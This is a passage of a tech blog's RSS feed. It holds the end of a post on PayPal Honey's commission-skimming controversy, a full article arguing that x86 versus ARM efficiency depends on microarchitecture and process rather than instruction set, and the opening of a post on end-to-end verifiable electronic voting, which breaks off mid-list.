<p>Worth noting: a parallel UK consumer suit over the misleading <em>&ldquo;best coupons&rdquo;</em> advertising was dismissed in June 2026. And Capital One Shopping, sued over a similar scheme, settled in September 2025 denying liability.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>What gets me about this whole story is PayPal&rsquo;s behavior at every step. Accused with video and live demonstrations, they called it fake news. Confronted with the code, they sent a cease-and-desist and tried to get the video pulled from Patreon with a copyright claim. Formally alerted about the defeat device, they called it <em>&ldquo;not accurate&rdquo;</em> and waited for Rakuten to act before switching it off. Caught, they announced they&rsquo;d <em>&ldquo;recently discovered&rdquo;</em> a system the company itself rebuilt in 2021.</p>
<p>At every rung, the choice was deny, threaten, minimize, until the evidence made the position untenable; then retreat half a step pretending surprise.</p>
<p>Honey, as a product, is a lost cause. Even if you don&rsquo;t care about the ethics of skimming creators&rsquo; commissions, remember what Amazon warned back in 2020: this is an extension with permission to read and modify your data on any website, one that scans your cookies, logs your browsing history with geolocation, and applied knowingly expired coupons just to keep the numbers up. Uninstall it. No coupon is worth that.</p>
<p>And there&rsquo;s an inspiring side to this: one motivated developer from New Zealand, armed with a packet sniffer, a test account, and patience, did what billion-dollar networks with compliance teams couldn&rsquo;t do in eight years. His weapon was a plain-text JSON file and a few dozen lines of JavaScript that PayPal itself served to anyone who bothered to look. The line that closes the fourth video sums up the arrogance he brought down:</p>
<blockquote>
  <p><em>&ldquo;When I&rsquo;m wrong, I&rsquo;m MegaLag. When I&rsquo;m right, I&rsquo;m just an industry commentator.&rdquo;</em></p>

</blockquote>
<p>Well, now he&rsquo;s a de facto technical witness in a federal case. David won this round. And it was beautiful to watch.</p>
]]></content:encoded><category>security</category><category>tech-market</category></item><item><title>Intel's Comeback: ARM64 vs X86-64 Is Not What You Think</title><link>https://www.akitaonrails.com/en/2026/08/11/intels-comeback-arm64-vs-x86-64-is-not-what-you-think/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/11/intels-comeback-arm64-vs-x86-64-is-not-what-you-think/</guid><pubDate>Tue, 11 Aug 2026 10:00:00 GMT</pubDate><description>&lt;p&gt;Since January, when the first Panther Lake laptops hit store shelves, reviews keep repeating a sentence that would have sounded absurd five years ago: an Intel x86 chip going toe to toe with the Apple M5. Not in everything — I&amp;rsquo;ll get to the caveats — but in the category that matters most day to day, battery life, the game has flipped. And that gives me the perfect excuse to write about a belief I see programmers repeat without checking: that true efficiency only comes with ARM64, because x86 is old, heavy, and full of 1978 baggage.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Since January, when the first Panther Lake laptops hit store shelves, reviews keep repeating a sentence that would have sounded absurd five years ago: an Intel x86 chip going toe to toe with the Apple M5. Not in everything — I&rsquo;ll get to the caveats — but in the category that matters most day to day, battery life, the game has flipped. And that gives me the perfect excuse to write about a belief I see programmers repeat without checking: that true efficiency only comes with ARM64, because x86 is old, heavy, and full of 1978 baggage.</p>
<p>My thesis: that was true generations ago, when decoding x86 cost a relevant slice of the die. Today x86 is, in practice, a translation layer into micro-instructions — and what separates Apple, Qualcomm, and Intel was never the instruction set. Intel&rsquo;s crisis was managerial and manufacturing, not architectural. Which is exactly why its comeback, now, makes sense.</p>
<h2>What the reviews show<span class="hx:absolute hx:-mt-20" id="what-the-reviews-show"></span>
    <a href="#what-the-reviews-show" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The Panther Lake laptops (Core Ultra series 3, launched at CES on January 5 and on sale since January 27) deliver numbers the Meteor/Arrow Lake era couldn&rsquo;t dream of. Starting with battery — Dell XPS 14 2026 (Core Ultra X7 358H) versus MacBook Air 15 (M5):</p>
<table>
  <thead>
      <tr>
          <th>Battery test</th>
          <th>Dell XPS 14 (Panther Lake)</th>
          <th>MacBook Air 15 (M5)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Web browsing (<a href="https://www.notebookcheck.net/43-hours-battery-life-Dell-XPS-14-2026-lasts-almost-3x-longer-vs-MacBook-Air-15-M5-in-web-browsing-test.1262947.0.html"target="_blank" rel="noopener">Hardware Canucks</a>, VRR on)</td>
          <td><strong>43 hours</strong></td>
          <td>14h30</td>
      </tr>
      <tr>
          <td>Web browsing (<a href="https://www.notebookcheck.net/Dell-XPS-14-2026-with-Intel-Panther-Lake-delivers-55-longer-battery-life-vs-2025-Dell-14-Premium.1225329.0.html"target="_blank" rel="noopener">Notebookcheck</a>, different methodology)</td>
          <td>16h45 (+55% vs 2025 model)</td>
          <td>17h12</td>
      </tr>
      <tr>
          <td>4K YouTube</td>
          <td><strong>20h21</strong></td>
          <td>14h</td>
      </tr>
      <tr>
          <td>Heavy load (gaming)</td>
          <td>2h30</td>
          <td><strong>4h10</strong></td>
      </tr>
  </tbody>
</table>
<p>The honest reading: in light use, the Dell ties or wins; under sustained load, Apple remains unbeatable. And DHH posted that his XPS 14 running Omarchy Linux gets over 16 hours of real use, with a 1.4W idle draw — Dell made a point of <a href="https://www.dell.com/en-us/blog/year-of-the-linux-laptop-omarchy-on-xps/"target="_blank" rel="noopener">day-one Linux support</a>.</p>
<p>On CPU, the flagship Core Ultra X9 388H against the M5 (<a href="https://www.notebookcheck.net/Intel-Panther-Lake-Core-Ultra-X9-388H-performance-analysis-Outpaces-Arrow-Lake-and-exceeds-Zen-5-in-efficiency.1212583.0.html"target="_blank" rel="noopener">Notebookcheck data</a>):</p>
<table>
  <thead>
      <tr>
          <th>Metric</th>
          <th>Core Ultra X9 388H</th>
          <th>Apple M5</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Cinebench 2024 multi-core</td>
          <td>~1,162</td>
          <td>~1,172 (<strong>statistical tie</strong>)</td>
      </tr>
      <tr>
          <td>Cinebench 2024 single-core</td>
          <td>~130</td>
          <td><strong>200</strong> (~30% ahead)</td>
      </tr>
      <tr>
          <td>Single-core efficiency</td>
          <td>5.17 pts/watt</td>
          <td><strong>13.1 pts/watt</strong></td>
      </tr>
      <tr>
          <td>Multi-core efficiency capped at 20W</td>
          <td>24.6 pts/watt</td>
          <td>24.8 (M4)</td>
      </tr>
  </tbody>
</table>
<p>Single-core remains Apple&rsquo;s territory — it does the same work <strong>on a third of the energy</strong>. But in moderate multi-core, Intel caught up. Against AMD (Ryzen AI 9 465) the 388H wins across the board; against the first-gen Snapdragon X Elite too; the X2 Elite Extreme, which arrived in 2026, already handed the Windows CPU crown back to Qualcomm (+24% in single-core). Honesty above all.</p>
<p>On GPU, the verdict is more mixed than Intel&rsquo;s marketing suggests:</p>
<table>
  <thead>
      <tr>
          <th>Arc B390 matchup</th>
          <th>Result</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>vs Radeon 890M (AMD)</td>
          <td><a href="https://videocardz.com/newz/intel-arc-b390-beats-amds-mainstream-igpus-and-nears-rtx-4050-level-performance-in-some-tests"target="_blank" rel="noopener">+63 to 80%</a></td>
      </tr>
      <tr>
          <td>vs laptop RTX 4050</td>
          <td>dead heat</td>
      </tr>
      <tr>
          <td>vs Strix Halo (AMD) at 15-20W</td>
          <td><a href="https://www.notebookcheck.net/No-chance-for-AMD-Intel-Panther-Lake-Core-Ultra-X9-388H-trounces-AMD-Strix-Halo-at-low-power-signaling-handheld-gaming-domination-in-2026.1213244.0.html"target="_blank" rel="noopener">wins</a></td>
      </tr>
      <tr>
          <td>vs base M5 GPU</td>
          <td>wins on performance, loses on fps/watt</td>
      </tr>
      <tr>
          <td>vs M5 Pro / M5 Max</td>
          <td><a href="https://nanoreview.net/en/gpu-compare/intel-arc-b390-vs-apple-m5-max-gpu-40-core"target="_blank" rel="noopener">17 against 24 and 44</a> — no chance</td>
      </tr>
  </tbody>
</table>
<p><a href="https://arstechnica.com/gadgets/2026/02/intel-panther-lake-core-ultra-review-intels-best-laptop-cpu-in-a-very-long-time/"target="_blank" rel="noopener">Ars Technica&rsquo;s</a> summary is the fairest: &ldquo;Intel&rsquo;s best laptop CPU in a very long time&rdquo; — with the caveat that Intel must prove this is the new normal, not an aberration.</p>
<blockquote>
  <p><strong>Remember this:</strong> MacBook battery life in an x86 laptop happened — in light use. In single-core and under heavy load, Apple still sets the pace.</p>

</blockquote>
<h2>The belief: &ldquo;to be efficient you have to be ARM&rdquo;<span class="hx:absolute hx:-mt-20" id="the-belief-to-be-efficient-you-have-to-be-arm"></span>
    <a href="#the-belief-to-be-efficient-you-have-to-be-arm" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Every programmer has heard the explanation: ARM has a simple, fixed-length, elegant instruction set. x86 is a chimera accumulated since 1978, with variable-length instructions, real mode, segmentation, decades of mess. &ldquo;Therefore&rdquo; ARM is inherently more efficient, and the way for anyone to reach Apple- or Qualcomm-class efficiency is to move to ARM64.</p>
<p>There&rsquo;s truth in there: x86 does carry historical baggage, and decoding variable-length instructions is objectively more annoying than decoding fixed 32-bit ones. The error is in the conclusion. That difference mattered when decode logic occupied a significant fraction of the chip. That was a long time ago.</p>
<blockquote>
  <p><strong>Remember this:</strong> the ISA difference mattered when decoding occupied a relevant fraction of the die. That ended generations ago.</p>

</blockquote>
<h2>x86 became a translation layer in 1995<span class="hx:absolute hx:-mt-20" id="x86-became-a-translation-layer-in-1995"></span>
    <a href="#x86-became-a-translation-layer-in-1995" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The Pentium Pro, from November 1995, already didn&rsquo;t execute x86 directly: it translated each CISC instruction into internal RISC-like micro-operations and executed those. AMD did the same with the K5 in 1996 (its &ldquo;ROPs&rdquo;). In other words: for <strong>thirty years</strong>, &ldquo;executing x86&rdquo; has meant &ldquo;translate it into something else and execute the something else.&rdquo; x86 is a compatibility interface, a translation layer over a RISC engine. And the numbers show how cheap that layer became:</p>
<table>
  <thead>
      <tr>
          <th>Measurement</th>
          <th>Result</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Micro-ops per x86 instruction (Pentium Pro, Intel data)</td>
          <td>1.2 to 1.7</td>
      </tr>
      <tr>
          <td>Micro-op cache hit rate (since Sandy Bridge, 2011)</td>
          <td>~80% overall, ~100% in hot loops</td>
      </tr>
      <tr>
          <td>Decoder cost on Haswell (<a href="https://research.aalto.fi/en/publications/empirical-study-of-the-power-consumption-of-the-x86-64-instructio/"target="_blank" rel="noopener">Hirki et al., 2016</a>)</td>
          <td>3 to 10% of package power, worst case</td>
      </tr>
      <tr>
          <td>Cost of disabling the micro-op cache (<a href="https://chipsandcheese.com/p/how-zen-2s-op-cache-affects-performance"target="_blank" rel="noopener">Zen 2, Chips and Cheese</a>)</td>
          <td>+4 to 10% in the core, +0.5 to 6% at the package</td>
      </tr>
  </tbody>
</table>
<p>When the micro-op cache hits, the fetch and decode hardware is literally switched off. The Hirki study&rsquo;s conclusion is dry: &ldquo;the x86-64 instruction set is not a major hindrance in producing an energy-efficient processor.&rdquo; And the definitive academic study — <a href="https://research.cs.wisc.edu/vertical/papers/2013/hpca13-isa-power-struggles.pdf"target="_blank" rel="noopener">Blem, Menon, and Sankaralingam, HPCA 2013</a>, actually measuring ARM against x86 — concluded: instruction count and mix are ISA-independent to first order, performance differences come from microarchitecture, and &ldquo;the energy consumption is again ISA-independent.&rdquo;</p>
<p>Jim Keller — the guy who designed AMD&rsquo;s Zen and Apple&rsquo;s A4/A5 chips, someone who has lived on both sides — put it even more bluntly in an AnandTech interview: variable-length decode &ldquo;isn&rsquo;t dominating the die, so it doesn&rsquo;t matter that much.&rdquo; What limits performance today, in his words, is branch predictability and data locality.</p>
<p>And here&rsquo;s the detail that kills the myth for good: modern ARM does the same thing. The Cortex-A77 has a micro-op cache. Samsung added one to the Exynos M5 explicitly to save fetch and decode power. Fujitsu&rsquo;s A64FX — the ARM inside the Fugaku supercomputer — decodes the SVE <code>FADDA</code> instruction into <strong>63 micro-ops</strong>. Sixty-three. The fantasy of &ldquo;ARM is one instruction per cycle, simple and pure&rdquo; hasn&rsquo;t existed in any high-performance ARM for a long time.</p>
<p>One honest nuance before moving on: x86&rsquo;s variable length really does make very wide decoders harder to build — Apple decodes <strong>up to twice as many</strong> instructions per cycle as an x86. That&rsquo;s a real engineering difficulty. But you pay for it in logic area, which is cheap, not in consumption proportional to the work — which is what defines battery life.</p>
<blockquote>
  <p><strong>Remember this:</strong> for thirty years, no x86 has executed x86 — everything becomes RISC-style micro-ops. The ISA became a compatibility interface.</p>

</blockquote>
<h2>The transistor math<span class="hx:absolute hx:-mt-20" id="the-transistor-math"></span>
    <a href="#the-transistor-math" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>To understand why the decode burden evaporated, look at the evolution:</p>
<table>
  <thead>
      <tr>
          <th>Year</th>
          <th>Chip</th>
          <th>Process</th>
          <th>Transistors</th>
          <th>Milestone</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>2000</td>
          <td>Pentium 4 Willamette</td>
          <td>180nm</td>
          <td>42 million</td>
          <td>the rising-clock era</td>
      </tr>
      <tr>
          <td>2006</td>
          <td>Core 2 Duo</td>
          <td>65nm</td>
          <td>291 million</td>
          <td>the post-Tejas multicore pivot</td>
      </tr>
      <tr>
          <td>2007</td>
          <td>Penryn</td>
          <td>45nm</td>
          <td>410 million</td>
          <td>industry&rsquo;s first high-k metal gate</td>
      </tr>
      <tr>
          <td>2011</td>
          <td>Ivy Bridge</td>
          <td>22nm</td>
          <td>1.4 billion</td>
          <td>3D FinFET, -50% power at the same performance</td>
      </tr>
  </tbody>
</table>
<p>In 2000, every block of logic was a tight budget, and x86&rsquo;s mess was expensive. As transistors became infinite for all practical purposes, the decoder&rsquo;s fixed cost became pocket change. Along the way, two important shifts:</p>
<ul>
<li><strong>Dennard scaling died around 2005.</strong> Leakage current stopped clocks from climbing, Intel canceled Tejas in 2004, and the world went multicore. Clocks stalled in the 1-4GHz range and never left.</li>
<li><strong>Moore&rsquo;s law became economics, not physics.</strong> Cost per transistor stopped falling at 28nm: a leading-edge fab today costs US$20 to 30 billion, and an ASML High-NA EUV machine costs US$350 million.</li>
</ul>
<p>And what occupies die and consumes energy in a modern chip? Giant caches, branch predictors, dozens of execution ports, GPU, NPU, media engines. The x86 decoder doesn&rsquo;t even show up in the bread line.</p>
<p>And history hands us the perfect empirical proof: from 2015 to 2021, Intel was stuck at 14nm — Skylake and its derivatives, six years of stagnant process from manufacturing failure. Even so, those old 14nm cores traded blows with AMD&rsquo;s Zen 2, built on TSMC 7nm. If x86 were the problem, that would be impossible. The bottleneck was the fab. It was the fab all along.</p>
<blockquote>
  <p><strong>Remember this:</strong> six years stuck at 14nm, and Intel still competed with TSMC 7nm chips. The bottleneck was the fab, never the ISA.</p>

</blockquote>
<h2>What actually makes Apple efficient<span class="hx:absolute hx:-mt-20" id="what-actually-makes-apple-efficient"></span>
    <a href="#what-actually-makes-apple-efficient" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The M1 isn&rsquo;t efficient &ldquo;because it&rsquo;s ARM.&rdquo; Apple has held an ARM architectural license since the A6, in 2012: it designs its own cores from scratch, and only the instruction set is ARM&rsquo;s. When AnandTech dissected the M1&rsquo;s Firestorm core, the contrast with contemporary x86 was about engineering choices, not instructions:</p>
<table>
  <thead>
      <tr>
          <th></th>
          <th>Apple Firestorm (M1, 2020)</th>
          <th>Intel Sunny Cove (2019)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Decode per cycle</td>
          <td>8</td>
          <td>4</td>
      </tr>
      <tr>
          <td>Reorder buffer</td>
          <td>~630 entries</td>
          <td>352 entries</td>
      </tr>
      <tr>
          <td>L1 instruction cache</td>
          <td>192KB</td>
          <td>32KB</td>
      </tr>
  </tbody>
</table>
<p>In practice: twice the decode width, nearly twice the reorder buffer, <strong>six times</strong> the instruction cache. Add unified memory soldered into the package and a cutting-edge TSMC process. That&rsquo;s aggressive microarchitecture, enormous caches, vertical integration, and a leading-edge process — all expensive, all deliberate, and none of it comes free with the ISA.</p>
<p>The reciprocal is also true, by the way: you can make bad ARM. The market is full of mediocre ARM. Efficiency is an engineering and process choice, not an ISA birth certificate.</p>
<blockquote>
  <p><strong>Remember this:</strong> the M1 is efficient because of microarchitecture, cache, process, and vertical integration — not &ldquo;because it&rsquo;s ARM.&rdquo;</p>

</blockquote>
<h2>Your favorite instructions aren&rsquo;t x86 or ARM<span class="hx:absolute hx:-mt-20" id="your-favorite-instructions-arent-x86-or-arm"></span>
    <a href="#your-favorite-instructions-arent-x86-or-arm" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>And there&rsquo;s something else almost nobody mentions in this debate: much of what a modern CPU executes doesn&rsquo;t belong to either side&rsquo;s &ldquo;classic&rdquo; instruction set. Look at what runs outside it:</p>
<ul>
<li><strong>Video.</strong> On Intel, decoding lives in Quick Sync, fixed-function hardware that has existed since Sandy Bridge — a separate block with nothing to do with the x86 legacy. It&rsquo;s because of it that Frandroid measured the Snapdragon X2 <strong>58% slower</strong> than Panther Lake in video export.</li>
<li><strong>Cryptography.</strong> AES-NI exists since 2010, SHA extensions since 2016 — dedicated instructions added decades after the &ldquo;old x86.&rdquo;</li>
<li><strong>AI and matrices.</strong> AVX-512, then AVX10, and AMX, a matrix tile accelerator. The ARM side has the equivalents: NEON, SVE, SME.</li>
</ul>
<p>Chips and Cheese ran the perfect experiment: in the same 4K HEVC encode, an Ampere ARM took <strong>more than twelve times</strong> as long as a Zen 2 with stock ffmpeg; using NEON assembly cut the ARM time by more than 60%. The difference was never ARM versus x86 — it was well-used vector extensions versus ignored vector extensions. In the real world, the heavy lifting lives in the extensions and accelerators, and those are orthogonal to the base ISA.</p>
<blockquote>
  <p><strong>Remember this:</strong> modern heavy lifting — video, crypto, AI — runs on dedicated extensions and accelerators, orthogonal to the base ISA.</p>

</blockquote>
<h2>The fall was managerial, not architectural<span class="hx:absolute hx:-mt-20" id="the-fall-was-managerial-not-architectural"></span>
    <a href="#the-fall-was-managerial-not-architectural" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Here&rsquo;s the part that convinces me completely. Look at the timeline and try to find &ldquo;x86 was a fundamental limitation&rdquo; anywhere in it:</p>
<ul>
<li><strong>2005-2006</strong>: Intel passes on making the iPhone&rsquo;s chip — Otellini admitted the regret in his exit interview with The Atlantic: &ldquo;the world would have been a lot different.&rdquo; And the tragicomic detail: Intel <strong>had</strong> an ARM division (XScale) — and sold it to Marvell in 2006 for US$600 million. It wasn&rsquo;t a lack of technology; it was a lack of vision.</li>
<li><strong>2013-2021</strong>: three CEOs. Krzanich left in 2018 over an internal scandal. In came Bob Swan, a finance CFO, to run an engineering company at the most delicate moment in its history.</li>
<li><strong>2018-2020</strong>: 10nm became a joke (Cannon Lake only in limited release) and in July 2020 Intel announced a 7nm delay — the stock dropped 16% in a day. In April 2019, it abandoned the 5G smartphone modem business; Apple bought the modem unit for US$1 billion. In November 2020, the M1.</li>
<li><strong>2021-2024</strong>: Gelsinger returned with the IDM 2.0 plan, &ldquo;five nodes in four years.&rdquo; In December 2024 he was pushed into &ldquo;retirement&rdquo; — a board ultimatum, per Reuters and Bloomberg. The year closed with a <strong>US$18.8 billion</strong> loss, 15,000 layoffs, a suspended dividend, and Intel expelled from the Dow Jones after 25 years — replaced by Nvidia, which at that point was worth <strong>more than 30 times</strong> Intel. By October 2025, the cumulative layoff count had reached 35,500.</li>
</ul>
<p>Nothing on that list is architecture. It&rsquo;s missed products, delayed fabs, wrong decision after wrong decision. x86 was there, competent, while the company dismantled itself around it.</p>
<blockquote>
  <p><strong>Remember this:</strong> the iPhone pass, the XScale sale, the broken 10nm, three CEOs, a US$18.8 billion loss — Intel&rsquo;s fall was decision after decision, not an x86 limitation.</p>

</blockquote>
<h2>The unlikely rescue<span class="hx:absolute hx:-mt-20" id="the-unlikely-rescue"></span>
    <a href="#the-unlikely-rescue" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>And then 2025 happened. Lip-Bu Tan took over in March. In August, Trump demanded his head on Truth Social over China ties — and just days later, after a White House meeting, became a fan. On August 22, the US government <a href="https://newsroom.intel.com/corporate/intel-and-trump-administration-reach-historic-agreement"target="_blank" rel="noopener">bought 9.9% of Intel</a>: 433.3 million shares at US$20.47, US$8.9 billion total, converting CHIPS Act grants into equity, with no board seat. SoftBank put in <a href="https://newsroom.intel.com/corporate/softbank-group-and-intel-corporation-sign-2b-investment-agreement"target="_blank" rel="noopener">US$2 billion</a>. And the surreal cherry on top: <strong>Nvidia</strong> — the same company that replaced it on the Dow — <a href="http://nvidianews.nvidia.com/news/nvidia-and-intel-to-develop-ai-infrastructure-and-personal-computing-products"target="_blank" rel="noopener">invested US$5 billion</a> and signed a partnership to put RTX chiplets into x86 CPUs.</p>
<p>The financial results started showing: Q1 2026 revenue of US$13.6 billion (+7% year over year), Q2 at US$16.1 billion (+25%), seventh consecutive quarter above projections. The stock the government paid US$20.47 for reached <strong>more than six times</strong> that price in May, when Bloomberg reported talks for Intel to manufacture Apple chips — preliminary reporting, production years away, but the market went wild. Even after cooling off, the US government&rsquo;s position is still worth <strong>five times</strong> what it cost. The American taxpayer is, today, a profitable Intel shareholder. Go figure.</p>
<blockquote>
  <p><strong>Remember this:</strong> the US government, SoftBank, and Nvidia as shareholders, and the stock five times above the government&rsquo;s entry price — Intel became a national cause, and the market bought the comeback.</p>

</blockquote>
<h2>The comeback, feet on the ground<span class="hx:absolute hx:-mt-20" id="the-comeback-feet-on-the-ground"></span>
    <a href="#the-comeback-feet-on-the-ground" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Panther Lake is the first big product on 18A — RibbonFET (gate-all-around transistors) plus PowerVia (backside power delivery), coming out of Fab 52 in Chandler, Arizona. There&rsquo;s delicious irony here: the flagship&rsquo;s 12-core GPU tile is still manufactured by TSMC. And 18A yields (the fraction of good chips per wafer), per Tom&rsquo;s Hardware, should only reach industry-standard levels in 2027 — the ramp is slow, and Ars Technica asks the right question: is this the new normal or an aberration?</p>
<p>But the point of this article isn&rsquo;t cheerleading. It&rsquo;s that Panther Lake empirically closes a debate that was theological. An x86-64 on a competitive process delivers MacBook battery life, ties the M5 in multi-core, and beats the Windows competition in several scenarios. If the ISA were the decisive factor, that would never happen, on any process. What brought Intel down was management; what brings it back is fabs and focus; and what separates Apple, Qualcomm, AMD, and Intel is microarchitecture, cache, process, and integration — exactly as Jim Keller and the literature always said.</p>
<p>I&rsquo;m rooting for the comeback. Not out of nostalgia from someone who built PCs with Pentiums, but because the efficient-laptop market was settling into a comfortable duopoly — and a comfortable duopoly is the enemy of price and innovation. Let the fight go on.</p>
<blockquote>
  <p><strong>Remember this:</strong> Panther Lake closes a theological debate: competitive x86 exists when the fab is competitive. It was never about instructions.</p>

</blockquote>
]]></content:encoded><category>hardware</category><category>reviews</category></item><item><title>Why a Perfect Digital Election Still Wouldn't Be Viable?</title><link>https://www.akitaonrails.com/en/2026/08/07/why-a-perfect-digital-election-still-wouldnt-be-viable/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/07/why-a-perfect-digital-election-still-wouldnt-be-viable/</guid><pubDate>Fri, 07 Aug 2026 10:00:00 GMT</pubDate><description>&lt;p&gt;Every election in Brazil turns into the same soap opera: half the country doesn&amp;rsquo;t trust the result. And unlike most countries, there is nothing to recount. Brazil is one of the few countries in the world with a &lt;strong&gt;100% digital&lt;/strong&gt; election: no paper receipt, no physical ballot, no possibility of an independent recount. Your vote goes into an electronic voting machine, becomes a number inside closed software, and out comes a tally. Either you trust the TSE (the Superior Electoral Court), or there&amp;rsquo;s nothing you can do.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Every election in Brazil turns into the same soap opera: half the country doesn&rsquo;t trust the result. And unlike most countries, there is nothing to recount. Brazil is one of the few countries in the world with a <strong>100% digital</strong> election: no paper receipt, no physical ballot, no possibility of an independent recount. Your vote goes into an electronic voting machine, becomes a number inside closed software, and out comes a tally. Either you trust the TSE (the Superior Electoral Court), or there&rsquo;s nothing you can do.</p>
<p>Recently the TSE put on a little theater show: it <a href="https://www.tse.jus.br/comunicacao/noticias/2026/Junho/eleicoes-2026-tse-abre-urna-eletronica-para-tecnicos-da-sociedade-brasileira-de-computacao"target="_blank" rel="noopener">&ldquo;opened up the voting machine&rdquo;</a> so technicians from the Brazilian Computer Society could look at the components. That&rsquo;s obviously useless. Showing a motherboard, a processor, and some memory chips proves there&rsquo;s no malware the way looking at a car&rsquo;s engine proves the driver is sober. Hardware is just the stage; the play happens in the software. And auditing the software is precisely what&rsquo;s hard, restricted, full of ritual and short windows — which completely defeats the purpose of public transparency. An audit that only a handful of credentialed people can perform, under supervision, for a few days, is not transparency. It&rsquo;s a performance.</p>
<p>And for the record: I&rsquo;m not defending the current system, and I have zero expectations for it. As I summed up in <a href="https://x.com/AkitaOnRails/status/2084669984555331706"target="_blank" rel="noopener">this tweet</a>: the voting machine is just a box, an old PC. Even if the software were perfect, it wouldn&rsquo;t matter — the processes around it stay secret, done behind closed doors. The machine is a smokescreen. With or without an alternative, I don&rsquo;t care about it.</p>
<p>Many people conclude from this that the answer is digital elections, but with a different system. This article is a computer science exercise: what would a hypothetically perfect system look like? And, more importantly, the final conclusion: <strong>why even that perfect system would not be a viable option.</strong></p>
<p>One thing worth emphasizing before we start: the system I&rsquo;m about to describe would require <strong>no</strong> secrecy from the government. No secret components, no secret processes, no locked rooms with credentialed people standing guard. Everything — the code, the data, the whole structure — could be 100% open, accessible to anyone, no restrictions whatsoever. And it would still be possible to prove, mathematically, that fraud is impossible. It&rsquo;s the exact opposite of the current model, where trust is born out of secrecy.</p>
<blockquote>
  <p>No patience for code and math along the way? <a href="#why-this-would-never-work">Skip straight to the part where I explain why this wouldn&rsquo;t work</a>. And at the end of the article, three appendices: <a href="#appendix-1-so-is-the-current-system-auditable">is the current system auditable?</a>, <a href="#appendix-2-skin-in-the-game--rewarding-those-who-verify">how to reward voters who verify their vote</a>, and <a href="#appendix-3-why-zero-knowledge-is-so-hard-to-swallow">why &ldquo;zero knowledge&rdquo; is so hard to swallow</a>.</p>

</blockquote>
<h2>&ldquo;The machine is safe because it&rsquo;s not on the internet&rdquo;<span class="hx:absolute hx:-mt-20" id="the-machine-is-safe-because-its-not-on-the-internet"></span>
    <a href="#the-machine-is-safe-because-its-not-on-the-internet" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Sooner or later, every defender of the current system plays this card: the voting machine isn&rsquo;t connected to the internet, so it can&rsquo;t be hacked from the outside. Technically true. And completely beside the point.</p>
<p>First, because isolation says nothing about what the software does. An offline machine can flip votes just the same — you simply get no way to watch it happen. And malware doesn&rsquo;t need a network to get in: it can come from the factory, from an update, from the supply chain, from a technician with physical access. Stuxnet, the most famous worm in history, crossed the air gap into Iran&rsquo;s centrifuges on a USB stick. An air gap is an obstacle, not proof of honesty. And notice: the machine&rsquo;s data has to leave it somehow at the end of the day, on physical media carried around or through later transmission. &ldquo;Not on the internet&rdquo; is a logistical half-truth.</p>
<p>Second, and more important: that argument exposes the wrong mental model. The current system&rsquo;s security comes from <strong>physical custody</strong> — seals, locked rooms, accredited observers, rituals. In other words, once again, from trusting people and processes you cannot see.</p>
<p>In the system I&rsquo;m about to describe, the machine could be <strong>plugged straight into the internet</strong>, publishing every vote to the public tree in real time, and fraud would still be impossible. Not because the network is safe, but because nobody needs to trust the machine:</p>
<ul>
<li>What it publishes are opaque commitments: even broadcasting everything live, there is no vote to leak in the published data.</li>
<li>Every commitment carries a mathematical validity proof: the machine cannot mint an invalid vote.</li>
<li>The tree is public and replicated by independent observers: nothing published can be altered later without breaking the hashes.</li>
<li>And if the machine flips your vote at the booth, the Benaloh challenge catches it (that&rsquo;s Building block 4, further down): it cannot know whether you&rsquo;ll cast or audit.</li>
</ul>
<p>Being online or not stops being the question. Security doesn&rsquo;t live in the absence of a network; it lives in public verification. &ldquo;Trust us, the machine is locked in a room&rdquo; becomes &ldquo;don&rsquo;t trust anything, check the math.&rdquo; That inversion is the one thing the current model cannot offer.</p>
<h2>The tweet that inspired this post<span class="hx:absolute hx:-mt-20" id="the-tweet-that-inspired-this-post"></span>
    <a href="#the-tweet-that-inspired-this-post" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I recently posted <a href="https://x.com/AkitaOnRails/status/2085550756837335483"target="_blank" rel="noopener">this tweet</a> about end-to-end verifiability (E2E-V). The gist of the idea:</p>
<ol>
<li>Every voter gets a paper receipt with a unique identifier — a hash — that <strong>identifies neither the person nor the vote</strong>.</li>
<li>Each precinct&rsquo;s votes go into a public structure you can only append to, never delete from (<em>append-only</em>): a Merkle tree (the same principle as a blockchain).</li>
<li>That tree is published in full. Any citizen downloads and verifies it.</li>
<li><strong>Individual verifiability:</strong> each voter checks that their hash is there, no middleman.</li>
<li><strong>Universal verifiability:</strong> anyone recomputes the tree and checks that it produces the announced total.</li>
</ol>
<p>I made it explicit in the tweet: this is <strong>not</strong> a solution, it&rsquo;s a napkin sketch. The concept exists, it&rsquo;s mathematically solid, and it&rsquo;s old news to anyone in computer science. But the reaction was interesting.</p>
<h2>The voto de cabresto problem<span class="hx:absolute hx:-mt-20" id="the-voto-de-cabresto-problem"></span>
    <a href="#the-voto-de-cabresto-problem" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A lot of the comments got stuck on the same point: the <em>voto de cabresto</em> — the &ldquo;halter vote&rdquo;. It&rsquo;s a historical practice in Brazil: the local political boss buys a poor voter&rsquo;s vote and demands proof they voted &ldquo;the right way&rdquo;. Back in the day it was the pre-marked ballot; today it would be a photo of the voting machine&rsquo;s screen (which is why phones are banned inside the booth).</p>
<p>And that raises an apparent contradiction:</p>
<ul>
<li>If the receipt the voter takes home <strong>reveals</strong> who they voted for, the vote can be coerced or sold.</li>
